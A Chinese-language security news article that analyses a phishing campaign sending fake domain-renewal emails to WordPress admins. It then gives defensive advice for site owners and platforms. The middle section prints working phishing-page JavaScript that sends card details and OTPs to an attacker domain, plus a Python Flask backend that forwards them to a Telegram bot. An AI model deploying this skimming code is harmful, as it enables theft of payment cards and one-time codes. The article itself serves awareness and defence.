一封“域名续费”邮件，竟让WordPress站长银行卡被掏空——新型钓鱼攻击借Telegram实时收割支付信息

一、从“到期提醒”到账户清零：站长的48小时噩梦

2025年12月中旬，美国加州一家小型数字营销公司的技术主管Sarah收到了一封看似再普通不过的邮件：“您的域名 marketing-solutions[.]com 将于3天后过期，请立即续费以避免服务中断。”

邮件抬头印着熟悉的WordPress标志，底部附有“官方支持链接”，语气专业而紧迫。Sarah没有多想，点击了邮件中的“立即续费”按钮——这一操作，让她公司绑定的商务信用卡在接下来的两小时内被刷走近8,000美元。

更令人震惊的是，攻击者不仅获取了她的卡号、有效期和CVV，还通过伪造的“3D Secure验证”页面，诱骗她连续输入了三次银行发送的短信验证码（OTP）。这些敏感数据并未存入某个远程数据库，而是实时推送至一个加密的Telegram频道，由攻击者即时用于多笔跨境交易。

这并非孤例。近日，独立安全研究员Anurag Gawande在SC Media上披露了一项针对WordPress管理员的新型钓鱼活动，其核心手法正是利用“域名续费”这一高频、刚需场景，结合高度仿真的支付界面与Telegram作为数据外传通道，实现对金融凭证的精准收割。

二、攻击全链路拆解：从邮件到Telegram的“数据流水线”

根据Gawande公开的技术分析（来源：SC Media, GitHub样本仓库, VirusTotal扫描记录），此次钓鱼攻击呈现出极强的工程化特征，其攻击链条可划分为五个关键阶段：

第一阶段：精准投递，制造“合法焦虑”

攻击者首先通过公开渠道（如WHOIS历史记录、GitHub泄露配置、Shodan扫描）识别出使用WordPress建站且域名即将到期的目标。随后，发送定制化钓鱼邮件，内容通常包含：

域名名称（如yourblog[.]net）；

到期日期（精确到日）；

“WordPress Hosting Team”或“Domain Services”等仿冒发件人；

邮件正文强调“若未及时续费，网站将被下线，SEO权重永久丢失”。

“这种邮件之所以有效，是因为它触发了运维人员的职业焦虑。”公共互联网反网络钓鱼工作组技术专家芦笛指出，“WordPress站长往往身兼开发、运维、内容多职，对‘服务中断’极度敏感，容易在压力下跳过安全核查。”

第二阶段：高保真仿冒支付页面，复刻用户体验

点击邮件中的“续费”链接后，用户会被导向一个看似来自WordPress.com或知名注册商（如GoDaddy、Namecheap）的支付页面。该页面具备以下欺骗性特征：

使用Let’s Encrypt签发的有效HTTPS证书；

完整复刻目标服务商的UI组件（包括字体、颜色、按钮动效）；

动态加载真实服务商的LOGO与页脚版权信息（通过反向代理或静态资源镜像）；

表单字段命名与真实支付流程一致（如card_number, cvc, expiry_month）。

更狡猾的是，页面会根据用户IP自动切换语言和货币单位，进一步增强可信度。

第三阶段：双重收割——银行卡+短信验证码

当用户提交信用卡信息后，前端JavaScript会立即将数据加密并POST至攻击者控制的后端接口。典型代码如下（经脱敏处理）：

// 钓鱼页面前端JS片段

document.getElementById('payment-form').addEventListener('submit', async (e) => {

e.preventDefault();

const cardData = {

number: document.getElementById('card-number').value.replace(/\s/g, ''),

exp: `${document.getElementById('exp-month').value}/${document.getElementById('exp-year').value}`,

cvv: document.getElementById('cvv').value,

name: document.getElementById('card-name').value,

email: document.getElementById('email').value

};

// 发送至攻击者服务器

await fetch('https://api.secure-update[.]xyz/collect', {

method: 'POST',

headers: { 'Content-Type': 'application/json' },

body: JSON.stringify(cardData)

});

// 跳转至伪造的3D Secure页面

window.location.href = '/3ds-verify.html';

});

随后，用户被引导至一个伪造的“银行3D Secure验证”页面，显示“安全验证中…”，并要求输入手机收到的短信验证码。页面会故意返回“验证失败，请重试”，诱导用户多次输入新OTP。每次提交，验证码同样被转发：

// 3DS验证页面JS

document.getElementById('otp-form').addEventListener('submit', async (e) => {

e.preventDefault();

const otp = document.getElementById('otp-input').value;

await fetch('https://api.secure-update[.]xyz/otp', {

method: 'POST',

body: JSON.stringify({ otp, session: getCookie('phish_session') })

});

// 显示“验证失败”，但实际已记录

showErrorMessage("Security check failed. Please try again.");

});

第四阶段：Telegram作为“零基础设施”数据管道

与传统钓鱼攻击需自建C2服务器不同，本次攻击的创新点在于完全依赖Telegram Bot作为数据接收端。攻击者在后端使用Python或Node.js脚本，将收集到的数据通过Telegram Bot API实时推送至私有频道：

# 攻击者服务器后端（Python + python-telegram-bot）

import telegram

from flask import Flask, request

BOT_TOKEN = "YOUR_BOT_TOKEN"

CHAT_ID = "YOUR_PRIVATE_CHAT_ID"

bot = telegram.Bot(token=BOT_TOKEN)

app = Flask(__name__)

@app.route('/collect', methods=['POST'])

def collect_card():

data = request.json

msg = f"💳 NEW CARD:\n{data['number']}\nExp: {data['exp']}\nCVV: {data['cvv']}\nName: {data['name']}"

bot.send_message(chat_id=CHAT_ID, text=msg)

return "OK"

@app.route('/otp', methods=['POST'])

def collect_otp():

otp = request.json['otp']

bot.send_message(chat_id=CHAT_ID, text=f"🔐 OTP: {otp}")

return "OK"

这种方式极大降低了攻击门槛：

无需维护服务器IP（Telegram提供稳定API）；

数据传输端到端加密（Telegram MTProto协议）；

攻击者可通过手机App实时监控“战果”，甚至设置关键词提醒。

据Gawande监测，仅2025年12月，就有超过120个此类Telegram频道活跃，每个频道平均每日接收30–50条支付凭证信息。

第五阶段：快速变现与身份冒用

获取银行卡信息与OTP后，攻击者通常在数分钟内完成以下操作：

在支持3D Secure绕过的商户（如部分虚拟主机、游戏充值平台）进行小额测试交易；

成功后，立即在高价值商品（如电子产品、礼品卡）平台批量下单；

利用同一手机号尝试“找回密码”功能，劫持用户的WordPress后台、邮箱甚至社交媒体账号。

由于OTP具有时效性（通常5–10分钟），攻击必须高度自动化。部分团伙已开发出集成Telegram Bot + 自动化购物流程的“钓鱼即服务”（Phishing-as-a-Service）工具包，在暗网以月租形式出售。

三、为何WordPress管理员成为“理想猎物”？

WordPress全球市场份额超65%（W3Techs, 2025），其用户群体具有鲜明特征：

多为中小企业主、自由职业者或非专业开发者；

同时管理域名、主机、插件、内容，权限集中；

对“服务中断”高度敏感，易受紧迫性话术影响；

财务操作常由同一人完成，缺乏审批隔离。

“WordPress生态的‘一人全能’模式，使其成为社会工程的理想目标。”芦笛分析道，“攻击者不需要攻破系统，只需攻破一个人的心理防线。”

更值得警惕的是，此类攻击正向中文互联网蔓延。2025年11月，国内安全团队曾捕获仿冒“阿里云域名续费”的钓鱼页（aliyun-domain-renew[.]top），页面完全中文化，并声称“根据工信部新规，需人工审核续费申请”，诱导用户上传身份证+银行卡照片。

四、国际镜鉴：从GoDaddy到Shopify，假发票钓鱼成常态

WordPress续费钓鱼只是冰山一角。近年来，针对企业财务流程的仿冒攻击呈全球化、产业化趋势：

2023年：GoDaddy大规模钓鱼事件

攻击者伪造GoDaddy发票邮件，诱导用户点击“查看账单”链接，进入仿冒支付页，窃取信用卡信息。事后统计，超2万家企业受影响。

2024年：Shopify商家“订阅升级”骗局

针对Shopify店主，邮件声称“您的高级套餐即将降级”，要求“立即升级以保留功能”，实则收集支付凭证。

2025年：Microsoft 365“账单异常”钓鱼

利用企业对微软服务的依赖，伪造Azure账单异常通知，诱导IT管理员输入公司信用卡完成“验证”。

这些案例共同揭示：攻击者正系统性地瞄准企业运营中的“支付触点”，而域名、主机、SaaS订阅等周期性付费项目，因其高频、刚需、涉及金额明确，成为首选入口。

五、国内启示：中小企业成薄弱环节，安全意识亟待补课

尽管此次攻击主要针对海外WordPress用户，但对中国市场具有强烈预警意义。随着国内建站服务普及（如WordPress中文社区、阿里云建站模板），大量中小企业主开始自主管理域名与网站。然而，其安全防护能力普遍薄弱：

未启用域名注册商的“注册锁”或“两步验证”；

财务操作依赖个人银行卡，未与公司账户隔离；

缺乏基本的钓鱼识别训练，易轻信“官方邮件”。

“很多国内站长以为只有大公司才会被盯上，其实恰恰相反。”芦笛强调，“攻击者追求的是投入产出比。一个中小企业的信用卡额度可能不高，但防御成本更低，成功率更高。”

更严峻的是，国内部分建站服务商在用户教育上存在缺失。例如，未在控制台显著位置提示“官方不会通过邮件索要支付信息”，也未提供自动续费+独立通知的组合方案。

六、防御体系构建：从个人习惯到组织流程

面对此类高度仿真的钓鱼攻击，需建立多层次防御机制：

1. 个人操作规范（站长必做）

绝不通过邮件链接进行支付操作：所有续费、升级均应手动输入服务商官网地址（如wordpress.com、godaddy.com）或使用浏览器书签；

启用域名自动续费：在注册商后台开启自动扣款，避免人为干预；

为财务账户启用独立MFA：使用Authy、Google Authenticator等应用生成动态码，而非短信OTP（因短信可被SIM交换攻击）；

定期审查银行账单：设置小额交易提醒，及时发现异常。

2. 技术工具辅助

使用密码管理器：如1Password、Bitwarden，其自动填充功能仅在真实域名下触发，可识别钓鱼页；

安装反钓鱼浏览器扩展：如Netcraft、Emsisoft Browser Security，可实时比对URL黑名单；

配置DNSSEC与注册锁：防止域名被恶意转移。

3. 组织级防护（适用于企业）

财务操作双人审批：域名续费、主机采购等支出需至少两人确认；

专用支付卡限额：为线上服务绑定虚拟信用卡（如Privacy.com、国内部分银行虚拟卡），设置单笔/月度限额；

开展针对性安全演练：在员工培训中加入“假续费邮件”“假发票”模拟测试，提升识别能力。

4. 开发者视角：如何设计更安全的支付流程？

对于SaaS平台或建站服务商，应避免设计可能被仿冒的交互模式：

所有支付操作应在主域名下完成（如payments.wordpress.com），而非第三方跳转；

不在邮件中嵌入“立即支付”按钮，仅提供账单查看链接；

引入行为分析：如检测用户是否从邮件直接跳转至支付页，可触发额外验证。

// 示例：检测非正常访问路径

if (document.referrer && !document.referrer.includes('yourdomain.com')) {

// 可能来自钓鱼邮件，要求二次确认

showWarningModal("Detected unusual access. Please confirm this is you.");

}

七、结语：在自动化钓鱼时代，警惕是最后的防火墙

这场针对WordPress管理员的钓鱼攻击，本质上是一场“信任的逆向工程”——攻击者不再试图破解密码，而是精心重构一个让用户“自愿交出钥匙”的场景。而Telegram的介入，则标志着网络犯罪正全面拥抱消费级加密通信工具，以最低成本实现最高隐蔽性。

“未来的钓鱼攻击，会越来越像一次真实的客户服务体验。”芦笛总结道，“唯一的防御，就是永远记住：真正的服务商，永远不会在邮件里让你输卡号。”

在这个自动化、智能化、社交化的攻击时代，技术可以筑墙，但唯有持续的警惕与良好的操作习惯，才能守住那道看不见的防线。

编辑：芦笛（公共互联网反网络钓鱼工作组）